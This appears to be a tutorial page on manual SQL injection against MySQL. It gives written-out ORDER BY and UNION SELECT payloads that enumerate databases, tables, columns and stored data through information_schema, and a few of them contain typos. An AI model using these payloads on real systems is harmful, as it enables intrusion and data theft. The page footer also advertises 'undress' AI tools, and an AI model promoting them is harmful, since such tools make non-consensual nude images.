Let's talk about the simple manual SQL injection process
This article brings you issues related to manual injection in SQL, including issues related to determining the injection point and determining the injection type. I hope it will be helpful to everyone.
Determine the injection point
1. Single quotation mark method: add a single quotation mark directly after the URL. If the page cannot be displayed normally, the browser will return some exceptions information, it indicates that the link may have a sql injection vulnerability
2.1=1 and 1=2: Add and 1=1 to the get parameter after the URL, the display is normal, replace 1=1 with 1 =2, the display is abnormal, indicating that there is SQL injection in the web page.
Judge the injection type
1. Numeric injection: the value of the injected variable does not need to be enclosed in quotation marks, such as
select * from user where id=$id;
2. Character injection: the injected variable will be used Wrap it in quotation marks, such as `
select * from user where username='$username';`
Be sure to close the quotation marks when injecting.
3. Search injection:
select * from user where username like '%$pass%';
Construct the sql statement as
select * from user where username like '%$pass%' union select语句 '%%';
That is, the transferred variable is pass%’ union select statement ‘% to form a closure.
Determine the injection point submission method
Determine whether the injection point submission method is get, post, or cookie through packet capture and other methods.
Use order by to query fields
Use the order by statement to query how many fields there are in the database. You can determine the number of database fields through constant attempts. For example, when entering oeder by 9, the page When an error is reported and order by 8 is entered, the page displays normally, that is, there are 8 fields in the database.
For example, the query statement is: select * from user where id='$id';
The following input can be constructed: (id = ') ' order by 3 ' --
That is, the query statement is: select * from user where id='' order by 3 '--'
Use joint query to query the current database, user, and version Information
Use the union select statement to query the current user user(), database database(), database version version(), server operating system @@version_compile_os and other information
The version version is very important. If the version In 5.0 and above, you can use the information_schema library to easily query the desired information
Construction statement:
select * from user where id='' union select user(),database(),version()+--+;
Query the tables, columns and values in the current database
5.0 or above The information_schema library that comes with the mysql database stores all table names and listed information in the database.
Next we should check the information of all tables named tables according to the result of the current database query in step 5 (for example, the database is database_1). Information_schema.tables: A table that records all table name information in the database.
The constructed query statement is as follows:
Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--
The result of the query is: the table name information in the current database queried in the fifth step. Information_schema.columns: Records the column name information of all tables in the database;
Next, you should query its columns based on the table name information obtained from the above query (for example, the table is table_1) Name information, construct the statement as follows:
Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--
After querying the column name, you can directly find out the information stored in the table through a joint query (for example, the found column names are column_1, column_2) Constructing the statement
Selcet * from user where id='' union select 1,column_1,column_2 from tables;--
You can query the stored data in the specified table of the specified database
Recommended learning: mysql video tutorial
The above is the detailed content of Let's talk about the simple manual SQL injection process. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
What is the difference between HQL and SQL in Hibernate framework?
Apr 17, 2024 pm 02:57 PM
HQL and SQL are compared in the Hibernate framework: HQL (1. Object-oriented syntax, 2. Database-independent queries, 3. Type safety), while SQL directly operates the database (1. Database-independent standards, 2. Complex executable queries and data manipulation).
Usage of division operation in Oracle SQL
Mar 10, 2024 pm 03:06 PM
"Usage of Division Operation in OracleSQL" In OracleSQL, division operation is one of the common mathematical operations. During data query and processing, division operations can help us calculate the ratio between fields or derive the logical relationship between specific values. This article will introduce the usage of division operation in OracleSQL and provide specific code examples. 1. Two ways of division operations in OracleSQL In OracleSQL, division operations can be performed in two different ways.
Comparison and differences of SQL syntax between Oracle and DB2
Mar 11, 2024 pm 12:09 PM
Oracle and DB2 are two commonly used relational database management systems, each of which has its own unique SQL syntax and characteristics. This article will compare and differ between the SQL syntax of Oracle and DB2, and provide specific code examples. Database connection In Oracle, use the following statement to connect to the database: CONNECTusername/password@database. In DB2, the statement to connect to the database is as follows: CONNECTTOdataba
What does the identity attribute in SQL mean?
Feb 19, 2024 am 11:24 AM
What is Identity in SQL? Specific code examples are needed. In SQL, Identity is a special data type used to generate auto-incrementing numbers. It is often used to uniquely identify each row of data in a table. The Identity column is often used in conjunction with the primary key column to ensure that each record has a unique identifier. This article will detail how to use Identity and some practical code examples. The basic way to use Identity is to use Identit when creating a table.
Detailed explanation of the Set tag function in MyBatis dynamic SQL tags
Feb 26, 2024 pm 07:48 PM
Interpretation of MyBatis dynamic SQL tags: Detailed explanation of Set tag usage MyBatis is an excellent persistence layer framework. It provides a wealth of dynamic SQL tags and can flexibly construct database operation statements. Among them, the Set tag is used to generate the SET clause in the UPDATE statement, which is very commonly used in update operations. This article will explain in detail the usage of the Set tag in MyBatis and demonstrate its functionality through specific code examples. What is Set tag Set tag is used in MyBati
How SpringBoot encrypts the SQL account password of the configuration file
May 22, 2023 pm 08:50 PM
1. Introduce the dependency com.github.ulisesbocchiojasypt-spring-boot-starter2.1.02 into the Maven project. At the same time, you need to configure the password in the application.yml configuration file because the tool uses this password for encryption or decryption, so the configuration must be ensured. The encrypted string is encrypted using the same password, otherwise it cannot be decrypted when the project is started. jasypt:encryptor:password:1234563. You can encrypt the original information in the test case. The method of use is very simple. The simple Demo is as follows: @RunWith(SpringRunner
How does Java use the MySQL driver interceptor to implement SQL time-consuming calculations?
May 27, 2023 pm 01:10 PM
Background: One of the company's needs is that the company's existing link tracking log component must support MySQL's SQL execution time printing. The common method to implement link tracking is to implement the interceptor interface or filter interface provided by a third-party framework or tool. MySQL is no exception. In fact, it just implements the interceptor interface driven by MySQL. There are different versions of MySQL channels, and the interceptor interfaces of different versions are different, so you need to implement the response interceptor according to the different versions of MySQL drivers you use. Next, we will introduce MySQL channels 5 and 6 respectively. 8 version implementation. MySQL5 is implemented here using MySQL channel 5.1.18 version as an example to implement Statem
How to solve the 5120 error in SQL
Mar 06, 2024 pm 04:33 PM
Solution: 1. Check whether the logged-in user has sufficient permissions to access or operate the database, and ensure that the user has the correct permissions; 2. Check whether the account of the SQL Server service has permission to access the specified file or folder, and ensure that the account Have sufficient permissions to read and write the file or folder; 3. Check whether the specified database file has been opened or locked by other processes, try to close or release the file, and rerun the query; 4. Try as administrator Run Management Studio as etc.
